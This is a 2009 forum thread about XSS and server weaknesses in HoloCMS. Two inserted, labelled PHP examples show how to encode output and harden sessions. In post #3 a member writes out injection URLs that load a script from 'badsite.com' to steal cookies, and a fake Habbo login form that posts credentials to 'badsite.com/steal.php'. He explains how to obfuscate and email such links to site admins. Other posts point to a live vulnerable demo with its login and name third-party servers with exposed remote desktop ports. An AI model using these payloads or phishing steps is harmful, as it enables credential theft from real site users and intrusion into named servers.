[HoloCMS Addon] [Info] XSS Vulnerability in Index.php and much more.

  1. #1
    MoBaTeY (Proficient Member), joined Jul 2008, 169 posts

    [HoloCMS Addon] [Info] XSS Vulnerability in Index.php and much more.

    I found some XSS vulnerabilities in the Index.php page of the Holo CMS

    As you can see below:




    To use the vulnerability: most JavaScript / other code inserted into the user field, then clicking Sign, will activate it.



    Try this code in any HoloCMS Username field:

    Ahh, since it's blocked, go here and copy it. http://pastebin.com/m1f8ca83
    You can try other codes etc., I know MOST of them work.

    Just to add in here: http://bobbalodge.org.uk has a Windows terminal exploit, which some people can use to get some information on the server etc. It's on TCP port 3389 as well as openhotel.co.uk.




    Another Exploit: Old version of Mod_SSL, if not patched can cause a person to use arbitrary code and cause a denial of service

    Another Exploit: People can send CONNECT requests allowing them to access some parts of your server [May be harmful]

    Another Exploit: If using PHPSESSID, people can make a custom one, allowing them to fraudulently authenticate into an account

    Another Exploit: User credentials aren't encrypted when they are transmitted. A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

    Another Exploit: Attackers may abuse HTTP TRACE functionality to gain access to information in HTTP headers such as cookies and authentication data.
    Last edited by MoBaTeY; 16-06-09 at 12:46 AM.
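
For the PHPSESSID and plaintext-credential items in the post above, one way to harden PHP's session handling. This is an added example, not HoloCMS code and not from the thread; the function names are hypothetical and the site is assumed to be served over HTTPS.

```php
<?php
declare(strict_types=1);

// Hypothetical session bootstrap for a PHP login page (PHP 7.3+ for the
// array form of session_set_cookie_params). Not taken from HoloCMS.

function start_hardened_session(): void
{
    // Refuse session IDs the server did not issue, so a visitor cannot
    // arrive with a PHPSESSID value chosen by someone else.
    ini_set('session.use_strict_mode', '1');
    // Accept the ID from the cookie only, never from a URL parameter.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');

    session_set_cookie_params([
        'lifetime' => 0,       // session cookie, dropped when the browser closes
        'path'     => '/',
        'secure'   => true,    // sent over HTTPS only (assumes the site has TLS)
        'httponly' => true,    // not readable from page script
        'samesite' => 'Lax',
    ]);
    session_start();
}

function complete_login(int $userId): void
{
    // Issue a fresh ID at the privilege change and delete the old session,
    // so an ID known before login is worthless afterwards.
    session_regenerate_id(true);
    $_SESSION = ['user_id' => $userId, 'authenticated_at' => time()];
}

function logout(): void
{
    // Clear the server-side state and drop the session record.
    $_SESSION = [];
    session_destroy();
}
```

Call `start_hardened_session()` before any output and `complete_login()` only after the password check succeeds. The TRACE item is handled in the web server rather than in PHP; on Apache the directive is `TraceEnable Off`.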


  2. #2
    Swineflu (Infraction Banned), joined May 2009, location: America, 770 posts

    Re: XSS Vulnerability [Index.php]

    That's nice, thanks mate, you always do good :P

  3. #3
    yifan_lu (Account Upgraded | Title Enabled!), joined Jun 2007, location: Next to a computer screen, 692 posts

    Re: XSS Vulnerability [Index.php]

    Yes, there are hundreds more. That's why I advise people not to use HoloCMS anymore.

    Also for noobs who don't understand how XSS exploits work:
    1) First of all, an XSS exploit is usually only useful IF it's GET (unlike the one posted), so ex: http://www.somesite.com/login.php?us...assword=123456
    2) In order to do something bad, you need 1) A GET XSS exploit, and 2) A usable (and stupid) target
    3) So, let's say I found an exploit. http://www.somesite.com/login.php?username=" /><script src="www.badsite.com/badscript.js"></script><input type="hidden" value="abc&password=123456
    4) On the site, it basically loads badscript.js from badsite.com quietly. Now what can we do in badscript.js? Well, first we can steal the cookie/session information (aka username/password if without protection like HoloCMS); there are other things you can do, but I haven't looked into it.
    5) You email this bad link to the target (the site admin or someone), usually disguising the link with ******* and/or String.fromCharCode and/or base64 encrypting.
    6) ???????
    7) PROFIT! You got their info.

    There is other stuff you can do, like create a fake logon or redirect the login to your site. So let's say I found an XSS exploit on habbo.com. Well, I could send some noob http://www.habbo.com/badsecurity?input="><h1>Log In</hi><form action="www.badsite.com/steal.php" method="post"><p>Username: <input type="text" name="username"></input><br />Password: <input type="pasword" name="password"></p></form><input type="hidden" value = "abc
    This will create a fake login form on Habbo's site that sends the login information to your server, but still has Habbo.com in the url.

    So that's XSS exploits for noobs. Basically what I'm trying to say is that XSS is only bad for the user, but it is the webmaster's responsibility to prevent their users from getting ripped off. It isn't like SQL exploits where it can be used to hurt your server (unless you fall for the bad link).


    EDIT: Here's an example of an XSS exploit http://pixelarts.habbohack.servegame...dmin/dashboard on Tsuka's admin panel demo site (username: Demo password: apdemo)
    (Sorry, Tsuka, but I didn't link to any bad scripts, but an attacker might)
    Last edited by yifan_lu; 16-06-09 at 01:02 AM.
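
The attribute breakout described in the post above, seen from the defending side. This is an added example, not HoloCMS source and not from the thread; the function names and the probe string are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical renderers for a login form that echoes the submitted username
// back into the page. Neither function is taken from HoloCMS.

/** Vulnerable: request data is concatenated straight into an attribute value. */
function render_username_unsafe(string $username): string
{
    return '<input type="text" name="username" value="' . $username . '" />';
}

/** Hardened: encode for the HTML attribute context at the point of output. */
function render_username_safe(string $username): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
    $encoded = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="username" value="' . $encoded . '" />';
}

/** Defence in depth: limits what injected markup could do if encoding is missed. */
function send_policy_headers(): void
{
    // script-src 'self' refuses scripts from other origins and inline scripts;
    // form-action 'self' stops a planted form from posting to another site.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; form-action 'self'");
    header('X-Content-Type-Options: nosniff');
}

// Constructed probe in the same shape as the thread's example: close the
// attribute, close the tag, then open new markup.
$probe = '" /><script>alert(1)</script><input type="hidden" value="abc';

foreach (['unsafe' => 'render_username_unsafe', 'safe' => 'render_username_safe'] as $label => $render) {
    $html = $render($probe);
    $live = strpos($html, '<script>') !== false;
    printf("%-6s script tag reaches the browser: %s\n  %s\n", $label, $live ? 'yes' : 'no', $html);
}
```

In a web request, `send_policy_headers()` has to run before any output is sent. The encoding applies equally to values arriving by GET and by POST, since the flaw is in how the value is written into the page, not in how it arrives.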

  4. #4
    NitroHabbz (C++ WoW Scripter), joined Mar 2008, 551 posts

    Re: XSS Vulnerability [Index.php]

    Thanks for the info Mobat, Just Patched it :)

  5. #5
    Kellynn (RageZone's Bitch <3), joined Jul 2008, location: Arizona, 1,052 posts

    Re: XSS Vulnerability [Index.php]

    There's a lot more out there, but thanks for this one

  6. #6
    •╩•andy•╩• (Account Upgraded | Title Enabled!), joined Jan 2008, location: PR, 1,353 posts

    Re: XSS Vulnerability [Index.php]

    Cool..

    I guess..

    CMS.. what to expect next.

  7. #7
    MoBaTeY (Proficient Member), joined Jul 2008, 169 posts

    Re: XSS Vulnerability [Index.php] and Many More.

    Just added much more Exploits

  8. #8
    NitroHabbz (C++ WoW Scripter), joined Mar 2008, 551 posts

    Re: XSS Vulnerability [Index.php] and Many More.

    Terminal exploits are easy to deter.

    Close Telnet ports, aka port 23.

    Or do what I do: use a Linux VPS for your CMS.

    Windows Terminal doesn't affect Linux

  9. #9
    chadderbox (Entrepreneur & Investor), joined Jun 2008, location: Look Behind You, 2,229 posts

    Re: XSS Vulnerability [Index.php] and Many More.

    Where are the other scripts?

    ALSO!

    Is there a script that I can put in the login and everyone can see it?
    Also is there a script like yifan's how you can edit the site?

  10. #10
    yifan_lu (Account Upgraded | Title Enabled!), joined Jun 2007, location: Next to a computer screen, 692 posts

    Re: XSS Vulnerability [Index.php] and Many More.

    They aren't scripts, they're exploits, and they're useless unless you can trick a user into going to your malformed link, and even if they do that, worst case you get their password.

  11. #11
    chadderbox (Entrepreneur & Investor), joined Jun 2008, location: Look Behind You, 2,229 posts

    Re: XSS Vulnerability [Index.php] and Many More.

    How did you get into Tsuka's exploits? Did you use an exploit? If yes can you tell me that one privately via PM?
    But I won't do it to anyone except on my PRIVATE hotel that's NOT mine (but I'm the coder/manager of it)

  12. #12
    yifan_lu (Account Upgraded | Title Enabled!), joined Jun 2007, location: Next to a computer screen, 692 posts

    Re: XSS Vulnerability [Index.php] and Many More.

    1) I have no idea what you are talking about. An exploit isn't an object, you can't GET someone's exploit. You can't release an exploit (like a lot of noobs do) in terms of a download.

    2) Why would you use an exploit on your own hotel? There's no point doing damage to yourself.

    3) I explained how it works and how to do it a few posts up (the very post where I linked to Tsuka's site)

  13. #13
    XxSamxX (Valued Member), joined Dec 2008, 115 posts

    Re: XSS Vulnerability [Index.php] and Many More.

    It's not his hotel, it's mine lol, we just had a server reboot and he took a screenie of it

  14. #14
    josh954r (Account Upgraded | Title Enabled!), joined Aug 2008, location: In ur Computer, 238 posts

    Re: XSS Vulnerability [Index.php] and Many More.

    thanks. will help me...


